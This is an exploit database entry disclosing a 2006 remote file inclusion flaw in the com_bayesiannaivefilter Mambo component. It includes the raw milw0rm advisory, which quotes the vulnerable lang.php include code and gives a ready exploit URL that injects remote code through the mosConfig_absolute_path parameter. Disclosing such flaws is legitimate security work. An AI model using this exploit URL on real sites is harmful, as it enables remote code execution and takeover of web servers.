com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)

vendor:

com_bayesiannaivefilter Mambo Component

by:

Pablin77

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: com_bayesiannaivefilter Mambo Component

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)

The com_bayesiannaivefilter Mambo component is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'lang.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code subject to the privileges of the webserver process. This can facilitate unauthorized access or privilege escalation.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of the component.

Source

Exploit-DB raw data:

#############################Pablin77 - XTech Inc Group################################
#
# com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)
#
#################################################################################
#
# Discovered By Pablin77
#
#
# contact: Pablin_77 [at] Argentina [dot] com
#
#
#          Lebanon-Israel...STOP! No War!!!
#
#                     peace, that's all
#
#  This is a massive cyber-protest, we are :
#
#  eno7 | XTech Inc | byond crew | hackbsd crew | digitalmind
#
#
################################################################################
#
# Greetz: eno7 , Byond Crew
#
# Special Gretz:XTeh Inc (Status-x, Furtivo, sys7ech)
#
###############################################################################

code from lang.php

include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/'.$mosConfig_lang.'.php');
  } else { 
    include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/english.php');
  }

Web:
http://forge.joomla.org/sf/scm/do/listRepositories/projects.com_bayesianspamfiltering/scm

exploit:
http://site.com/[path]/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[Evilcode]

##############################MARY TE AAAAAMOOOO!!!############################
###############################################################################

# milw0rm.com [2006-07-30]